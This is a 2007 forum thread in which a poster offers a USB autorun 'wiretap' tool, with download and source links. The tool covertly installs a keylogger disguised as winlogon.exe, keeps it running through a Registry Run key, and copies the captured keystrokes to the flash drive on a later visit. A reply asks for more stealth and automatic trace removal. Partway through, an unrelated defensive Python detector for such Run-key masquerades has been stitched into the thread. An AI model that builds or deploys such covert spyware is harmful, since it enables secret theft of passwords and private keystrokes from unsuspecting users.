davidork Posted October 12, 2007

Check it out

For non-U3 flash drives. Runs on 2k/XP/and possibly Vista.

Plug in the flash drive, wait for autorun to kick in, click wiretap the computer logs installs a stealth keylogger and logs out. On the next login the keylogger starts running.

Come back later, plug in the flash drive, wait for autorun to kick in, click wiretap again, you get a prompt from pssuspend asking you to agree to a EULA (had to use Sysinternals pssuspend to pause the keylogger process, to prevent it from throwing an error when the keylogger's log is dumped) and it dumps the keylogger's log to the flash drive.

For now the log only contains the keystrokes from the current login, but I've got a pretty good idea for the fix, but won't add it until the next release (v 2.0).

It ain't perfect, but it'll get the job done.

You can get the files at hxxp: davidork. googlepages. com/usbwt. zip and the source code at hxxp: davidork. googlepages. com/usbwt-src. zip

Honestly, I don't know if there will be a 2.0. It was just a "let's see if we can pull this off" proof of concept type thing, but if there is another release:

Plans for 2.0
installs a system service (instead of a HKLM>software>microsoft>windows>currentversion>run registry entry)
won't require pssuspend to dump logs
will log more than the current login
neater install/dump process
artwork?

But for those of you who are curious as to what this is but don't want to download, I'll cover the basics of what's going on.

On the first insertion, it checks to see if the keylogger is already installed. If not, it installs it, by copying the keylogger to c:/windows/winlogon.exe. The naming here is important, it has the same image name as a vital system process, thus you can't close it.

It patches itself into the registry to run at start up, HKLM>software>microsoft>windows>currentversion>run>c:\windows\winlogon.exe, then runs shutdown -l to logout, and on the next login the keylogger kicks in and starts logging to c:\windows\setup.dat

On the second insertion, it checks again to see if it's installed. If it is, it then runs pssuspend to pause the keylogger (to prevent a file in use error), copies the log off onto the flash drive, then unsuspends the keylogger.

If you download it and try it... here's removal instructions.

Don't try to kill it with task manager (it won't let you), and you can use a little tool from Sysinternals called pskill to kill it, however being that it has the same name as a Windows process (winlogon.exe) doing so causes an instant bluescreen.

start > run > type regedit > hit enter > navigate to HKLM>SOFTWARE>MICROSOFT>WINDOWS>CURRENTVERSION> and delete c:\windows\winlogon.exe, then logout. Log back in (this effectively kills the keylogger without a bluescreen), then delete c:\windows\winlogon.exe and c:\windows\setup.dat
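A defender-side check for the persistence trait described in the post above (a Run-key value pointing at a file named like a system process but stored outside System32), given as an added example that is not part of the original post or of the tool. It assumes the input is the text output of `reg query` on the HKLM Run key and a system root of C:\Windows; the sample data and value names are constructed.

```python
import ntpath
import re

# Image names that legitimately run only from %SystemRoot%\System32.
SYSTEM_IMAGES = {"winlogon.exe", "csrss.exe", "lsass.exe", "services.exe", "smss.exe"}

# Constructed sample of `reg query` output; value names are made up.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater    REG_SZ    "C:\Program Files\Vendor\updater.exe" /background
    winlogon    REG_SZ    c:\windows\winlogon.exe
"""

def image_path(command, system_root):
    """Extract the executable path from a Run-key command line."""
    command = re.sub(r"%(systemroot|windir)%", lambda m: system_root,
                     command.strip(), flags=re.I)
    if command.startswith('"'):                 # quoted path, optional arguments
        return command[1:].split('"', 1)[0]
    m = re.search(r"^.*?\.exe", command, flags=re.I)
    return m.group(0) if m else command.split(" ", 1)[0]

def is_masquerade(path, system_root):
    """True if path uses a system image name but is not the System32 copy."""
    name = ntpath.basename(path).lower()
    if name not in SYSTEM_IMAGES:
        return False
    expected = ntpath.join(system_root, "System32", name).lower()
    return ntpath.normpath(path).lower() != expected

def find_masquerading_run_entries(reg_output, system_root=r"C:\Windows"):
    """Return (value name, image path) for suspicious Run-key values."""
    hits = []
    for line in reg_output.splitlines():
        m = re.match(r" {4}(.+?) {4}(REG_[A-Z_]+) {4}(.*)$", line)
        if not m:
            continue
        path = image_path(m.group(3), system_root)
        if is_masquerade(path, system_root):
            hits.append((m.group(1), path))
    return hits

if __name__ == "__main__":
    for value, path in find_masquerading_run_entries(SAMPLE):
        print(f"suspicious Run value {value!r}: {path}")
```

The same `is_masquerade` test can be applied to the image paths in a process listing, since the post's binary also shows up as a second winlogon.exe running from outside System32.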
bloodsplat Posted November 11, 2007

Is there any way to get the keylogger to start when a certain application opens or a process starts and only run for a couple of minutes? You should include a program that auto removes any traces of the keylogger like the registry entry, or even just have an option where the keylogger only works when the USB is connected to the comp and runs straight from the USB. Would be very helpful if trying to be stealthy.